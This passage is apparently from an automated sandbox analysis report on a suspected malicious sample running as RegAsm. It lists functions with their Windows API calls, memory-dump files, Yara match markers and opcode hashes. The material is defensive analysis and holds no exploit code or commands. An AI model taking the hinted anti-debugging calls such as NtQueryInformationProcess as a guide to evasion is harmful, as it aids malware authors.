                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 568878067-0
                                                                                                        • Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
                                                                                                        • Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
                                                                                                        • Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
                                                                                                        • Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4
                                                                                                        Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
                                                                                                        • NtQueryInformationProcess.NTDLL(00000000), ref: 00401474
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentInformationQuery
                                                                                                        • String ID:
                                                                                                        • API String ID: 3953534283-0
                                                                                                        • Opcode ID: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
                                                                                                        • Instruction ID: b0d32a7bd978dbc9842abeebd7712166406d741a383243a14520f93e3bb00ea5
                                                                                                        • Opcode Fuzzy Hash: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
                                                                                                        • Instruction Fuzzy Hash: 23E01271640304F7EF109BA0DD0AF5F72AC9700749F201175A606E60E0D6B8DA009A69
                                                                                                        Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2099609381-0
                                                                                                        • Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
                                                                                                        • Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
                                                                                                        • Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
                                                                                                        • Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649
                                                                                                        Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
                                                                                                        • Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
                                                                                                        • Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
                                                                                                        • Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919
                                                                                                        Function 6C1A8EA0 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3550a8de41428d27622b2a166725bb1b0b94578aa7879d7fa9394c4ff600cad5
                                                                                                        • Instruction ID: 4e84fb2eb1de02006c4565d81d0ec7dd13af437e54a09632c8f484b1ef8e3e48
                                                                                                        • Opcode Fuzzy Hash: 3550a8de41428d27622b2a166725bb1b0b94578aa7879d7fa9394c4ff600cad5
                                                                                                        • Instruction Fuzzy Hash: 3F11B276B012958FE704CF55D88479AB7B5BF4631CF0442AAD8058FA41D775D887C7C1
                                                                                                        Function 6C280C40 Relevance: .1, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 63323ee303d310e3bf9fc7729428787ce618392a0717bc4cb55730e8021873ff
                                                                                                        • Instruction ID: 762a1eb15310ecf74f3cef1a83b3ef3bbc135736daedf57ee5115a64501100dd
                                                                                                        • Opcode Fuzzy Hash: 63323ee303d310e3bf9fc7729428787ce618392a0717bc4cb55730e8021873ff
                                                                                                        • Instruction Fuzzy Hash: AF11917570634A9FDB00DF19C8806AA77A5FF85368F14806DEC198B751DB71E80ACBA0
                                                                                                        Function 6C280D60 Relevance: .0, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                        • Instruction ID: e15bc2c86733291f2fa027b215a320bee53279282b8da9cfeaeb7d09ecc5f63c
                                                                                                        • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                        • Instruction Fuzzy Hash: 2EE06D3EA03059A7DB148E09C450AA97399DF8561AFA4C479DC599BA41D633F8078781
                                                                                                        Function 0040111D Relevance: .0, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                        • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                                        • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                        • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                                        Function 00418599 Relevance: .0, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                        • Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
                                                                                                        • Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
                                                                                                        • Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00
                                                                                                        Function 0041859A Relevance: .0, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                        • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                        • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                        • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                        Function 0040148A Relevance: .0, Instructions: 11COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                        • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                        • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                        • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                        Function 004014A2 Relevance: .0, Instructions: 3COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                        • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                        • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                        • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950
                                                                                                        Function 0040DCA0 Relevance: 90.4, APIs: 60, Instructions: 399memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,750A5460,?,00000000), ref: 0040DBBB
                                                                                                          • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBCD
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,750A5460,?,00000000), ref: 0040DD04
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DD0B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD20
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD27
                                                                                                        • strcpy_s.MSVCRT ref: 0040DD43
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DD55
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD62
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DD93
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DD9A
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DDA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DDA8
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDBD
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DDC4
                                                                                                        • strcpy_s.MSVCRT ref: 0040DDDA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDEC
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DDF3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE11
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE18
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE1F
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DE26
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE3B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE42
                                                                                                        • strcpy_s.MSVCRT ref: 0040DE52
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DE64
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE6B
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040DE93
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DE9A
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040DEA1
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DEA8
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEC3
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DECA
                                                                                                        • strcpy_s.MSVCRT ref: 0040DEDD
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DEEF
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DEF6
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040DEFF
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DF15
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DF1C
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040DF34
                                                                                                          • Part of subcall function 0040F128: std::_Xinvalid_argument.LIBCPMT ref: 0040F13E
                                                                                                        • strcpy_s.MSVCRT ref: 0040DF75
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000001,00000001), ref: 0040DF9B
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DFA8
                                                                                                        • lstrlenA.KERNEL32(?), ref: 0040DFAD
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040DFBC
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040DFC3
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFD7
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040DFDE
                                                                                                        • strcpy_s.MSVCRT ref: 0040DFEC
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040DFF9
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E000
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E035
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E03C
                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 0040E043
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040E04A
                                                                                                        • strcpy_s.MSVCRT ref: 0040E065
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E077
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E07E
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E122
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E129
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E173
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040E17A
                                                                                                          • Part of subcall function 0040DB7F: strchr.MSVCRT ref: 0040DBF2
                                                                                                          • Part of subcall function 0040DB7F: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
